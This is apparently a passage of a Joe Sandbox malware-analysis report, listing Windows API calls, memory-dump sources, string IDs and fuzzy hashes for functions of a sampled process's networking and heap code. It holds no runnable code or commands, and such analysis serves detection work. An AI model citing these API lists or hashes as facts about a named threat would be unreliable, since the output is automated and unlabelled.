                                                                                                                                                                        • Part of subcall function 03773F60: send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                        • Part of subcall function 03773F60: SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                        • Part of subcall function 03773F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                        • Part of subcall function 03773F60: WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                        • Part of subcall function 03773F60: shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                        • Part of subcall function 03773F60: closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 037744DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 542259498-0
                                                                                                                                                                      • Opcode ID: b9348ae89a763ba452ed1707b181963f1e4d6b49d22d742a8c0e7c0048def601
                                                                                                                                                                      • Instruction ID: 0b57c501933872a45acdb0bfdb0060068adc21f3557074ed2a17d7ee4f98004b
                                                                                                                                                                      • Opcode Fuzzy Hash: b9348ae89a763ba452ed1707b181963f1e4d6b49d22d742a8c0e7c0048def601
                                                                                                                                                                      • Instruction Fuzzy Hash: D6216F76640708ABC630EF79EC85A97B3E8EF89710F104A1EE68AC7640D671E405DBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C64443
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C6444C
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C6444E
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C6445D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00001770), ref: 02C644AB
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C644C8
                                                                                                                                                                        • Part of subcall function 02C63F60: GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                        • Part of subcall function 02C63F60: send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                        • Part of subcall function 02C63F60: SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                        • Part of subcall function 02C63F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                        • Part of subcall function 02C63F60: WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                        • Part of subcall function 02C63F60: shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                        • Part of subcall function 02C63F60: closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C644DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 542259498-0
                                                                                                                                                                      • Opcode ID: df3f04ee29f7b66d069727e3f58d69b8f1a7dad2c02f68e0f2a1986d9bfece49
                                                                                                                                                                      • Instruction ID: b922b56e2dfb10fd26552ee200610fd39e34a909cbcdf1f39715125bc1444f5b
                                                                                                                                                                      • Opcode Fuzzy Hash: df3f04ee29f7b66d069727e3f58d69b8f1a7dad2c02f68e0f2a1986d9bfece49
                                                                                                                                                                      • Instruction Fuzzy Hash: F5217176640704ABC734EF79EC89BA7B3E8FF89710F500A1EF58AC7640D671A4058BA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?), ref: 03774E99
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?,?), ref: 03774EB8
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?), ref: 03774EC2
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 03774ED9
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03774EE2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03774EE9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: 88ad2089f5007b3280815993eaf664839b8f60cc5b8cba5b107f32b5f1dcf664
                                                                                                                                                                      • Instruction ID: a7f6e5c3639b8298f473e2834d37c9984e1d991d243f88c98e2d3c874429f2dd
                                                                                                                                                                      • Opcode Fuzzy Hash: 88ad2089f5007b3280815993eaf664839b8f60cc5b8cba5b107f32b5f1dcf664
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F1186327043089BD720FB7AEC8497BF3ECEB48621B044A3FE615C6540D675D805C7A5
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?), ref: 02C64E79
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?,?), ref: 02C64E98
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?), ref: 02C64EA2
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 02C64EB9
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 02C64EC2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 02C64EC9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0377DD32
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0377DE35
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: Main
                                                                                                                                                                      • API String ID: 1452528299-521822810
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03773648), ref: 03774054
                                                                                                                                                                        • Part of subcall function 03772BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03772BD6
                                                                                                                                                                        • Part of subcall function 03772BC0: SwitchToThread.KERNEL32 ref: 03772BEA
                                                                                                                                                                      • send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3254528666-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,74DEDFA0,02C63648), ref: 02C64054
                                                                                                                                                                        • Part of subcall function 02C62B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C62B96
                                                                                                                                                                        • Part of subcall function 02C62B80: SwitchToThread.KERNEL32 ref: 02C62BAA
                                                                                                                                                                      • send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3254528666-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774074
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774087
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774090
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774099
                                                                                                                                                                        • Part of subcall function 03771350: HeapFree.KERNEL32(?,00000000,?,?,?,037740A6,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03771390
                                                                                                                                                                        • Part of subcall function 03771420: HeapFree.KERNEL32(?,00000000,?,?,?,037740B1,?,00000000,03774039,?,74DEDFA0,03773648), ref: 0377143D
                                                                                                                                                                        • Part of subcall function 03771420: _free.LIBCMT ref: 03771459
                                                                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 037740B9
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 037740D4
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774150
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774157
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1219087420-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64074
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64087
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64090
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64099
                                                                                                                                                                        • Part of subcall function 02C61350: HeapFree.KERNEL32(?,00000000,?,?,?,02C640A6,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C61390
                                                                                                                                                                        • Part of subcall function 02C61420: HeapFree.KERNEL32(?,00000000,?,?,?,02C640B1,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C6143D
                                                                                                                                                                        • Part of subcall function 02C61420: _free.LIBCMT ref: 02C61459
                                                                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C640B9
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C640D4
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64150
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64157
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1219087420-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_malloc
                                                                                                                                                                      • String ID: ($6$gfff$gfff
                                                                                                                                                                      • API String ID: 3506388080-713438465
                                                                                                                                                                      • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                      • Instruction ID: 331c29e54ce41b48a2782cad8a74fde6f5137732ad6923dfe5a0df80ce6448c7
                                                                                                                                                                      • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                      • Instruction Fuzzy Hash: D2D17EB1D01318EFDB14EFE5ED85AAEBBB9FF48300F104529E505AB251D770A905CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03771610: __vswprintf.LIBCMT ref: 03771646
                                                                                                                                                                      • _malloc.LIBCMT ref: 03772330
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                      • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                      • API String ID: 3723585974-868042568
                                                                                                                                                                      • Opcode ID: c147293662df851cf4bc9efac12f6fd17b0b235767dbedb2bf4d057d0f30ea3d
                                                                                                                                                                      • Instruction ID: 8bc6541bf586638d3912fb44fee4b428480803a98c07f0502e983c164744e646
                                                                                                                                                                      • Opcode Fuzzy Hash: c147293662df851cf4bc9efac12f6fd17b0b235767dbedb2bf4d057d0f30ea3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 90B1A275A002058FCF18DF68D8846AAB7B5BF48310F184ABEDD699B347DB31D941CB90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C61610: __vswprintf.LIBCMT ref: 02C61646
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C62330
                                                                                                                                                                        • Part of subcall function 02C66E83: __FF_MSGBANNER.LIBCMT ref: 02C66E9C
                                                                                                                                                                        • Part of subcall function 02C66E83: __NMSG_WRITE.LIBCMT ref: 02C66EA3
                                                                                                                                                                        • Part of subcall function 02C66E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66EC8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                      • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                      • API String ID: 3723585974-868042568
                                                                                                                                                                      • Opcode ID: a1ed18bb6bf2ace4a9a1db2cb34c74722b5b1233dc9ea4b3da99d39427f30eef
                                                                                                                                                                      • Instruction ID: 61f360d82c3d4369fa54d562027359d6f12391506cb2d85ba7f8c39b885bda82
                                                                                                                                                                      • Opcode Fuzzy Hash: a1ed18bb6bf2ace4a9a1db2cb34c74722b5b1233dc9ea4b3da99d39427f30eef
                                                                                                                                                                      • Instruction Fuzzy Hash: 51B1AF75A002058BCF18CF69C8C86BA7BA6FF84314F0846BEDD499B346D771DA45CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 03771878
                                                                                                                                                                      • _free.LIBCMT ref: 037718B6
                                                                                                                                                                      • _free.LIBCMT ref: 037718F5
                                                                                                                                                                      • _free.LIBCMT ref: 03771935
                                                                                                                                                                      • _free.LIBCMT ref: 0377195D
                                                                                                                                                                      • _free.LIBCMT ref: 03771981
                                                                                                                                                                      • _free.LIBCMT ref: 037719B9
                                                                                                                                                                        • Part of subcall function 0377F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F64F
                                                                                                                                                                        • Part of subcall function 0377F639: GetLastError.KERNEL32(00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000), ref: 0377F661
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 06586830e64b33b7d4aa8dc10a299d73e2e0036fedba189d929af3703125b820
                                                                                                                                                                      • Instruction ID: 1b4bbf19141e1184340ee1441d5d7d35489773cc01b72de9b03f499eedb6daba
                                                                                                                                                                      • Opcode Fuzzy Hash: 06586830e64b33b7d4aa8dc10a299d73e2e0036fedba189d929af3703125b820
                                                                                                                                                                      • Instruction Fuzzy Hash: 84514DB6A00211CFDB14DF58C184965BBB6FF89214B6980BDD50A9F321D732AD42CF91
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 02C61878
                                                                                                                                                                      • _free.LIBCMT ref: 02C618B6
                                                                                                                                                                      • _free.LIBCMT ref: 02C618F5
                                                                                                                                                                      • _free.LIBCMT ref: 02C61935
                                                                                                                                                                      • _free.LIBCMT ref: 02C6195D
                                                                                                                                                                      • _free.LIBCMT ref: 02C61981
                                                                                                                                                                      • _free.LIBCMT ref: 02C619B9
                                                                                                                                                                        • Part of subcall function 02C66E49: HeapFree.KERNEL32(00000000,00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66E5F
                                                                                                                                                                        • Part of subcall function 02C66E49: GetLastError.KERNEL32(00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000), ref: 02C66E71
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: ecd2d68ca2cf95cc2344cb4762ca5cb7522a901389cc8024da71331bc0440b97
                                                                                                                                                                      • Instruction ID: 9127faf11660656e2b80ca6128182fadcb0c3040b9eb6de92a5a2c29f2c73c14
                                                                                                                                                                      • Opcode Fuzzy Hash: ecd2d68ca2cf95cc2344cb4762ca5cb7522a901389cc8024da71331bc0440b97
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D514D72A00210CFD714DF59C5C8969BBA6BF8931972E81ADC50EAF311C772AE52CF91
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03773883
                                                                                                                                                                      • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 037738C4
                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03773931
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377395C
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 037739F4
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03773A22
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03773A39
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058130114-0
                                                                                                                                                                      • Opcode ID: 27f0bc4b4147f3daaab859d2f9508a4a4f382c87182947d0d0d6d91ea91df48e
                                                                                                                                                                      • Instruction ID: 4ede836604282eb9d1ed79adb64ce98868e67e2ef163ffd809042220ff7a7563
                                                                                                                                                                      • Opcode Fuzzy Hash: 27f0bc4b4147f3daaab859d2f9508a4a4f382c87182947d0d0d6d91ea91df48e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7651A3786007059BFF20EF24C984B9AB7E8BF44718F14492AE956DB280DB75F840DF91
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C63883
